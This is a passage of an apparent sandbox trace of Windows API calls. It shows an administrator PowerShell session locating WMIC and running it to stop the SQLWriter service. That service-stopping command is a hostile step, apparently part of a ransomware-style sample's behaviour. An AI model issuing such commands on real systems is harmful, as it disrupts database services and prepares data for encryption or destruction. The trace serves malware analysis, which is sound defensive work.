out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.814] SetErrorMode (uMode=0x1) returned 0x1 [0245.814] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.814] SetErrorMode (uMode=0x1) returned 0x1 [0245.814] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.815] SetErrorMode (uMode=0x1) returned 0x1 [0245.815] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.815] SetErrorMode (uMode=0x1) returned 0x1 [0245.815] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.815] SetErrorMode (uMode=0x1) returned 0x1 [0245.815] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0245.815] SetErrorMode (uMode=0x1) returned 0x1 [0245.816] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.816] SetErrorMode (uMode=0x1) returned 0x1 [0245.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0245.816] SetErrorMode (uMode=0x1) returned 0x1 [0245.816] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.816] SetErrorMode (uMode=0x1) returned 0x1 [0245.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0245.817] SetErrorMode (uMode=0x1) returned 0x1 [0245.817] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.817] SetErrorMode (uMode=0x1) returned 0x1 [0245.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0245.817] SetErrorMode (uMode=0x1) returned 0x1 [0245.817] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.818] SetErrorMode (uMode=0x1) returned 0x1 [0245.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0245.818] SetErrorMode (uMode=0x1) returned 0x1 [0245.818] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0245.818] SetErrorMode (uMode=0x1) returned 0x1 [0245.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c92d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0245.818] SetErrorMode (uMode=0x1) returned 0x1 [0245.818] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c92d480 | out: lpFindFileData=0x1c92d480*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0245.819] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c92d490 | out: lpFindFileData=0x1c92d490*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0245.819] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0245.819] SetErrorMode (uMode=0x1) returned 0x1 [0245.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c92d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0245.819] SetErrorMode (uMode=0x1) returned 0x1 [0245.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c92d7b0 | out: lpFileInformation=0x1c92d7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0245.819] SetErrorMode (uMode=0x1) returned 0x1 [0245.820] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0245.820] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c92d998, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c92d998) returned 0x4550 [0245.821] CoTaskMemFree (pv=0x1b9b1010) [0245.821] GetConsoleWindow () returned 0x5011e [0245.822] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0245.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0245.822] CoTaskMemFree (pv=0x2af7b0) [0245.822] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0245.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0245.822] CoTaskMemFree (pv=0x2af7b0) [0245.822] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice", pNumArgs=0x1c92d9e0 | out: pNumArgs=0x1c92d9e0) returned 0x28a430*="" [0245.823] lstrlenW (lpString="path") returned 4 [0245.823] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa9f0 [0245.823] RtlMoveMemory (in: Destination=0x1b9aa9f0, Source=0x28a472, Length=0xa | out: Destination=0x1b9aa9f0) [0245.823] CoTaskMemFree (pv=0x1b9aa9f0) [0245.823] lstrlenW (lpString="Win32_Service") returned 13 [0245.823] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0245.823] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1010) [0245.823] CoTaskMemFree (pv=0x1b9b1010) [0245.823] lstrlenW (lpString="where") returned 5 [0245.823] CoTaskMemAlloc (cb=0xe) returned 0x1b9aa9f0 [0245.823] RtlMoveMemory (in: Destination=0x1b9aa9f0, Source=0x28a498, Length=0xc | out: Destination=0x1b9aa9f0) [0245.823] CoTaskMemFree (pv=0x1b9aa9f0) [0245.823] lstrlenW (lpString="name like '%%SQLWriter%%'") returned 25 [0245.823] CoTaskMemAlloc (cb=0x36) returned 0x1b9c7170 [0245.823] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x28a4a4, Length=0x34 | out: Destination=0x1b9c7170) [0245.823] CoTaskMemFree (pv=0x1b9c7170) [0245.823] lstrlenW (lpString="call") returned 4 [0245.823] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa9f0 [0245.823] RtlMoveMemory (in: Destination=0x1b9aa9f0, Source=0x28a4d8, Length=0xa | out: Destination=0x1b9aa9f0) [0245.823] CoTaskMemFree (pv=0x1b9aa9f0) [0245.823] lstrlenW (lpString="stopservice") returned 11 [0245.823] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0245.823] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a4e2, Length=0x18 | out: Destination=0x1b9b1010) [0245.824] CoTaskMemFree (pv=0x1b9b1010) [0245.824] LocalFree (hMem=0x28a430) returned 0x0 [0245.824] CoTaskMemAlloc (cb=0x804) returned 0x1b9df250 [0245.824] GetConsoleTitleW (in: lpConsoleTitle=0x1b9df250, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0245.825] CoTaskMemFree (pv=0x1b9df250) [0245.825] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0245.826] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c92d940*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3159c98 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLWriter%%'\" call stopservice", lpProcessInformation=0x3159c98*(hProcess=0x5e4, hThread=0x5e0, dwProcessId=0xbbc, dwThreadId=0xbc0)) returned 1 [0245.830] CoTaskMemFree (pv=0x253f20) [0245.830] CloseHandle (hObject=0x5e0) returned 1 [0245.830] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0245.830] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c92d9e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c92d9e8) returned 0x4550 [0245.830] CoTaskMemFree (pv=0x1b9b1010) [0245.831] GetCurrentProcess () returned 0xffffffffffffffff [0245.831] GetCurrentProcess () returned 0xffffffffffffffff [0245.831] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x5e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c92dac8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c92dac8*=0x5e0) returned 1 [0247.241] CloseHandle (hObject=0x5e0) returned 1 [0247.241] GetExitCodeProcess (in: hProcess=0x5e4, lpExitCode=0x1c92db38 | out: lpExitCode=0x1c92db38*=0x0) returned 1 [0247.241] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0247.243] CloseHandle (hObject=0x5e4) returned 1 [0247.244] SetEvent (hEvent=0x5b0) returned 1 [0247.244] SetEvent (hEvent=0x5a4) returned 1 [0247.244] SetEvent (hEvent=0x5a8) returned 1 [0247.244] SetEvent (hEvent=0x5ac) returned 1 [0247.244] SetEvent (hEvent=0x5c0) returned 1 [0247.244] SetEvent (hEvent=0x5b4) returned 1 [0247.244] SetEvent (hEvent=0x5b8) returned 1 [0247.244] SetEvent (hEvent=0x5bc) returned 1 [0247.244] SetEvent (hEvent=0x5c4) returned 1 [0247.245] CoUninitialize () Thread: id = 173 os_tid = 0xa24 [0247.278] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0247.280] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0247.281] VirtualQuery (in: lpAddress=0x1c8ed780, lpBuffer=0x1c8ee640, dwLength=0x30 | out: lpBuffer=0x1c8ee640*(BaseAddress=0x1c8ed000, AllocationBase=0x1bf60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0247.283] VirtualQuery (in: lpAddress=0x1c8eda30, lpBuffer=0x1c8ee8f0, dwLength=0x30 | out: lpBuffer=0x1c8ee8f0*(BaseAddress=0x1c8ed000, AllocationBase=0x1bf60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0247.286] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0247.286] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0247.286] CoTaskMemFree (pv=0x2af7b0) [0247.286] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0247.286] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0247.286] CoTaskMemFree (pv=0x2af7b0) [0247.287] CoTaskMemAlloc (cb=0x20e) returned 0x2bc470 [0247.287] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bc470 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0247.288] CoTaskMemFree (pv=0x2bc470) [0247.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.288] SetErrorMode (uMode=0x1) returned 0x1 [0247.288] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.289] SetErrorMode (uMode=0x1) returned 0x1 [0247.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.289] SetErrorMode (uMode=0x1) returned 0x1 [0247.289] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.290] SetErrorMode (uMode=0x1) returned 0x1 [0247.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.290] SetErrorMode (uMode=0x1) returned 0x1 [0247.290] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.290] SetErrorMode (uMode=0x1) returned 0x1 [0247.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.291] SetErrorMode (uMode=0x1) returned 0x1 [0247.291] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.291] SetErrorMode (uMode=0x1) returned 0x1 [0247.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.292] SetErrorMode (uMode=0x1) returned 0x1 [0247.292] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.292] SetErrorMode (uMode=0x1) returned 0x1 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.292] SetErrorMode (uMode=0x1) returned 0x1 [0247.292] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.293] SetErrorMode (uMode=0x1) returned 0x1 [0247.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.293] SetErrorMode (uMode=0x1) returned 0x1 [0247.293] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.294] SetErrorMode (uMode=0x1) returned 0x1 [0247.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.294] SetErrorMode (uMode=0x1) returned 0x1 [0247.294] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.294] SetErrorMode (uMode=0x1) returned 0x1 [0247.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.295] SetErrorMode (uMode=0x1) returned 0x1 [0247.295] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.295] SetErrorMode (uMode=0x1) returned 0x1 [0247.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.295] SetErrorMode (uMode=0x1) returned 0x1 [0247.295] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.296] SetErrorMode (uMode=0x1) returned 0x1 [0247.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.296] SetErrorMode (uMode=0x1) returned 0x1 [0247.296] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c8ed960 | out: lpFindFileData=0x1c8ed960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0247.296] SetErrorMode (uMode=0x1) returned 0x1 [0247.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0247.297] SetErrorMode (uMode=0x1) returned 0x1 [0247.297] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", 